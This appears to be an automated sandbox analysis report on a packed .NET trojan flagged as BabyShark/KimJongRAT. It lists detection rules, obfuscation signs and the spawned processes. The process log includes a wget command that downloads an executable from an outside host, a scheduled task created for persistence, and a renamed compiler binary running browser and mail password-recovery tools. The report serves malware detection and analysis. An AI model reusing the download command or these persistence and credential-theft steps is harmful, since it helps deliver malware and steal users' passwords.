Source: 12.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 12.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 7.2.qaxCr0UKyI0yfkE.exe.16f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 7.2.qaxCr0UKyI0yfkE.exe.16f0000.2.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)Show sources
Source: qaxCr0UKyI0yfkE.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: TPykFAdhwNOvb.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.NET source code contains calls to encryption/decryption functionsShow sources
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u200d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u200d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u200d????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u200c???????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
.NET source code contains many API calls related to securityShow sources
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u206f????????????????????????????????????????.csSecurity API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u206f????????????????????????????????????????.csSecurity API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u206f????????????????????????????????????????.csSecurity API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u206a????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u202d????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u202d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Classification labelShow sources
Source: classification engineClassification label: mal100.phis.troj.spyw.evad.win@14/8@1/1
Contains functionality for error loggingShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004183B8 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,8_2_004183B8
Contains functionality to check free disk spaceShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00418842 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,8_2_00418842
Contains functionality to enum processes or threadsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00413C19 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,FindCloseChangeNotification,free,Process32NextW,FindCloseChangeNotification,8_2_00413C19
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004149B0 FindResourceW,SizeofResource,LoadResource,LockResource,8_2_004149B0
Creates files inside the user directoryShow sources
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\cmdline.outJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:888:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_01
Creates temporary filesShow sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeFile created: C:\Users\user\AppData\Local\Temp\tmpC925.tmpJump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\497ab1dd171eeef956401f1aeb0b9fec\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\497ab1dd171eeef956401f1aeb0b9fec\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Queries a list of all open handlesShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformationJump to behavior
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
Reads ini filesShow sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\SysWOW64\wget.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\SysWOW64\wget.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\wget.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
SQL strings found in memory and binary dataShow sources
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exe, 00000008.00000002.1978302785.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe' > cmdline.out 2>&1
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe'
Source: unknownProcess created: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe 'C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TPykFAdhwNOvb' /XML 'C:\Users\user\AppData\Local\Temp\tmpC925.tmp'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpD3D3.tmp'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpC597.tmp'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe' Jump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TPykFAdhwNOvb' /XML 'C:\Users\user\AppData\Local\Temp\tmpC925.tmp'Jump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess created: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpD3D3.tmp'Jump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpC597.tmp'Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\SysWOW64\wget.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32Jump to behavior
Tries to open an application configuration file (.cfg)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfgJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: C:\Users\Cassandra\Desktop\Premium\CyaX\CyaX\obj\Debug\CyaX.pdb source: qaxCr0UKyI0yfkE.exe, 00000004.00000002.1973693827.0000000002FF0000.00000004.00000001.sdmp
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exe
Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exe
Source: Binary string: C:\Users\Vendetta\source\repos\FormatSources\FormatSources\obj\Debug\FormatSources.pdb source: qaxCr0UKyI0yfkE.exe, qaxCr0UKyI0yfkE.exe.2.dr
Source: Binary string: mscorrc.pdb source: qaxCr0UKyI0yfkE.exe, 00000004.00000002.1976827425.0000000004FF0000.00000002.00000001.sdmp, qaxCr0UKyI0yfkE.exe, 00000007.00000002.2385190996.0000000008450000.00000002.00000001.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpackerShow sources
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/menay.cs.Net Code: UXiSZOcCZRxIyvroWqXdVnGqAozbSVLRi System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/menay.cs.Net Code: UXiSZOcCZRxIyvroWqXdVnGqAozbSVLRi System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/menay.cs.Net Code: UXiSZOcCZRxIyvroWqXdVnGqAozbSVLRi System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/menay.cs.Net Code: UXiSZOcCZRxIyvroWqXdVnGqAozbSVLRi System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/menay.cs.Net Code: UXiSZOcCZRxIyvroWqXdVnGqAozbSVLRi System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/menay.cs.Net Code: UXiSZOcCZRxIyvroWqXdVnGqAozbSVLRi System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004449B3 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_004449B3
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 4_2_0075755C push ebp; retf 4_2_00757560
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 4_2_007577D6 push AD1B205Ah; retf 4_2_007577E6
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 4_2_02BF3B9D push es; ret 4_2_02BF3B9E
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 4_2_02BF0B0D push esi; iretd 4_2_02BF0B0F
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 4_2_02BF377A push ss; retf 4_2_02BF3781
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 4_2_02BF24E8 push ebp; retf 4_2_02BF24EA
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_00CF77D6 push AD1B205Ah; retf 7_2_00CF77E6
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_00CF755C push ebp; retf 7_2_00CF7560
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055199E0 pushfd ; iretd 7_2_055199E1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00445190 push eax; ret 8_2_004451A4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00445190 push eax; ret 8_2_004451CC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00449EB4 push eax; ret 8_2_00449EC1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00444F79 push ecx; ret 8_2_00444F89
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00412341 push ecx; ret 12_2_00412351
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00412360 push eax; ret 12_2_00412374
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00412360 push eax; ret 12_2_0041239C
Binary may include packed or encrypted codeShow sources
Source: initial sampleStatic PE information: section name: .text entropy: 7.94237630013
Source: initial sampleStatic PE information: section name: .text entropy: 7.94237630013
.NET source code contains many randomly named methodsShow sources
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/BAXyVpJquGzWGCp.csHigh entropy of concatenated method names: 'dewtyKSWfZDrUqzYgOBzBuhpTJhlaTPVTWN', 'mRZOcRfsOIrSasCPZsfXyDJmgEljIaGnywL', 'WGAXUWQttigXHSjULDSxzLaCEnKRUokZjZ', 'OnapuhBabseDxeobiuhBYORFkiOCvCHzRXe', '.ctor', 'DWcOonqjenmLWcfTXWrLQfXTGdUrVNJIG', 'xcLEaUYGtuWPSGKShQhXFQnUHLXJVzeUK', 'riNxwPZbrcilZebGjInQDwLCdDjAFKAtX', 'gJcbPtkfXJbwYSRyyefeogloOaArvexHVqlI', 'GiqbdFmlgHLcItTlXNHSbbavLXCVSEUhGc'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/Tester/cfSLS.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'UqyixXZotxFwemAKnrfbbvpTJYlultHZab', 'TAtIRRdGNmSvPYXhQrGmgpHQjGWDGNRZJRXN', 'zXDseRDtApxZRkFwnqNXJTuAXWORtfYAuI', 'CZFWScJHuzmtpnAIDUnFqFFehmZoNvEOFX', 'xZfCfRtwnSaJkaLcQNdlIiySssQIHPJJhgrJ', 'xHzXOBheKniPhRCRvcffFQPwecsGXzQrueqP', 'TkOOKeZDrHldDdxZwHeZykKfDQinBtRfEsBt', 'DTcAYVBdeBwIBYehNuRfmxXkXcFNsyOWghi'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/Effects/vhvCnScudaJK.csHigh entropy of concatenated method names: 'hUDZPtPegJkNKjAQtSXnsYNQnSgZbVFfCWKl', 'uiHaITXlczBZqOAyGrjPIdcBGHTketejnkx', 'UAUytDxZFsInLaoALSKxKNEhjjUcIfFatdO', 'BqijaxCHyxTpyjUQarhBUikFFyNdmbbzY', '.ctor', 'IqXpbZSuWtqDEuFfeHOlEtxPhUVaERuCFG', 'chebPveURZsDZjYlmzwzKETsLHCQEBBtBD'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/SsrXqWqckQCrvj.csHigh entropy of concatenated method names: 'iOlHdQhTAckufgLtRppNFsyRTRTRAuOpl', 'ntQBshxAxOozJPaiITngKwXEGaIXSLTSiDG', 'rQpXQvpBpwUnNWtcdrXwGWdYmTIlYTvFQhGt', 'WddkqzCksggJbQVPBlIWfRcXFHkTRLBPSqL', 'hHZyUSGiUfHBHjEpekDljRybUVLxldVlp', 'sYVCdVKrHenpXpmNJldowLAAcbOLzGxhv', '.ctor', 'QZApokZdmFgBOqIoDuRGzRWKfSlpriSZmBf'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/dUGNSEqE.csHigh entropy of concatenated method names: 'OXhzvPIABrXbcyVvicyRZSYurCktHiINxZV', 'ockpwrLEjmnEKHJbelrGCgpjQkEZJxXeWi', 'ktwZdqOPmNSXRcwPwJUHgEGSBESoKgXuGf', 'AbuZFGWzNwbzeijGdirGlFhhXPgQKarTu', 'fRmTJeeDeNXVoHBtQwQFVKfSvDstydQnaQw', 'jpOOHojEixDcDoBhdlGHcjForJVIHbvDUG', '.ctor', 'qFBQtbZUopyavnAzeQLojkCpInkSDcBEc', 'iKQUOKFLTyiZDsWFtJoLInzFLyxOLQhKidJ', 'RmhVNLaSAQInSFRbtNtGhSmxJLzJbouwq'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/wyCYmZnQYaRwVkKC.csHigh entropy of concatenated method names: '.ctor', 'JFoDjtSuqKLyZZsHdOpbQZysPvNVeGGYSgB', 'WGcNWBAiLSRoiPkrtZzsVICeLyFrsefzY', 'JOUmGDdmyfJfAAAAlewLKzuvpIXHnaEdqkdx', 'dZcpcvCTfQkmkWwELGibEahiJcqXATdzbjnb', 'OhxnCpqlspGKeRgkNcwZOfBwqrECwkSqewU', 'kmbNxYmxjzbLYrjZbFGqVbCekhpvdGlWU'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/CWfA.csHigh entropy of concatenated method names: 'mCtmKpVVqzoglaBaJAWBPoIVKIYUfANdADw', 'NXFUfFGpDlNQWuhPTqlIjfuIaRjPhzCRT', 'rtgaXNXRKurmBwzsltPSFucPvtLlvcXliqUQ', 'SiDkkEGrmJSgNPamndmVIRDJyWuvsAlVxKn', 'QPLixCsHvlKGnFZisNiuKgYhxibQozsGHv', 'vANkHcuRGBmxiTPsQsfFrsrEDfbAUeieBw', 'fnUGNNLJCKNWezaUcRWBcVSJbcufmtIwW', 'FHDcFDfRLPpiQCUuEShUDRhSHkRLYjKaBN', 'dWOCmniVlkzGamqYvpxBEKNoQIrIkrnllwea', 'uxrxnlmKRartbTaYLcNxEmcKcnYgKqcovHn'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/UXJYzIYriAOH.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'uyDZqofGJxNuQnXVKOFRBFRVQVUJTwnAkSJ', 'GIvhGLTjoGHfIgFyKQWsBYmCJPDIHTpKcrLa', 'gzeHoiQbtyCmRYBJTcRJcHbjCOVagNNXm', 'bpmlxhwvRZIDqjvWIlaKvFWJVWeafdFTI', 'wOEokzOWrXhvGtNFDIDXUClAgtxozyiJnt', 'lvojSbJxFvrWNUvtKzPdIwjdidycXTltoZ', 'QmKCwKspWHHmgBzqDiFAjFHgDZnTVhvvfL', 'lLBJBjmXBmotOtRbLmdYyLJnDetTpRCFcHwi'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/DtmJmghRepJRjNS.csHigh entropy of concatenated method names: '.ctor', 'jmOiwttsbqsBRaghzInUdqJAjBvhZeXFXvel', 'lKQkCJneWysHnpdvOzkhIBJeIFjctbeuiXC', 'ySAxwbPomrVrryIRdAgEOCFKGYhwVYTYlm', 'wxpWQOvEXnKyuUBdbypWLoBKTxoIaZbjA', 'uuqhqPnIrAimvHUKvjCyQFkqwQzERAKFX', 'RcDoOKXXmRmDVZZVaHrDrtkFqfmhCrlKzTLx', 'aKfrYnYlZGqJnrBixkYNcaUzkwmrmeRSL', 'tuXDaLHhPnrzFzjZWlucsRqsZATNWKJafVz', 'PbjIQuPLngJFJULyHqzJuoIYWKgOZiVJzZiS'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/yhsvcD.csHigh entropy of concatenated method names: 'vgiqbpdsZZSRjijojrDZvTzVcFFxbsIkNZ', 'AoFkEdiPzhsREvNOuQILtKXaTPcKDOsxTcco', 'atAJajxGtiOyGLfESKJgVArJBuwJgiqoulIJ', 'nDntvBRtAnUEXJdIObGnqZLthRQVuQNvsvr', 'kmOEoHTZxFLbYVamajnFfgXYJkeGlRKIrr', 'GwjLrYntBNBmQwZqhubOYrReSHFHQHCax', 'hXUjHwZlgAaxvAvfidKORirFyBKSJBLTz', 'vFIcxNDXiWaNNyvSXowNYTiKLaKooWhJTqq', 'dyDcYKFyKxqXHJYDJYHEaiRDYslzNymVrcG', 'ZLoQNttqDoYmqNfokBgWtWNHxnzuDXeJzeA'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/VfG.csHigh entropy of concatenated method names: 'ilHNbxekpbZzUXAGaNbmXJXjbjJvaOdUTm', 'XRbcCfJitFSNScjYuZsVghvmWuETiQsfFi', 'epIDDuRbTcyRWkcIaTuVLHAsqEEnsRcpg', 'jKwgQEjCtWunEBZJyVzqzCdbvDpRtdwqCgs', 'oZxYEKFlSJJQuEfDxvDfjaluBZPhRXvuxVFz', 'HZHmZOtpVDbpoKfalkAVWfUOonGHxAuoG', 'cmuSIsFedHKWdijcZfGdUgxhXDRyBrJztcfI', 'leooCrCBwxfnCBDKlVRuyJJZUOroNnbHZIeK', '.ctor', 'uEQsgQfNDNEVvTfXXDDIqFOEjzWnrKqbjB'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/JRecbvfNSTtx.csHigh entropy of concatenated method names: 'BqqcTlipHuGvbJvmKWXOLCjgvOdDlYgjRr', 'OepSWjFbaFHdyVxvKmFVDeOANCuxJpJbKxix', 'YhYznSTazUwClxAHqyAnarkkydGkJeZcwXst', 'WwKxxzmGPYyFKnkHejkEBgfsVdlkSTZvoUfN', 'wmlPtlARIyfDYviqoetAOYsalWSdQqcYFtC', 'DqIIdpKmQqsILXHxmRFbxgijWUneIPUNWQxN', 'jPTXeqUQnLjyYAHJHzsykQJZtSsUgRVpIFi', 'keFRNXqCuphsJqfLHXFQHLAJjFqsZCubKEb', 'APFQzYwPugLdjnkVfaZGwarKlfEnKqORps', 'oweGxzapGJRTdNbtWwhWEQYCiyrWKyYhr'
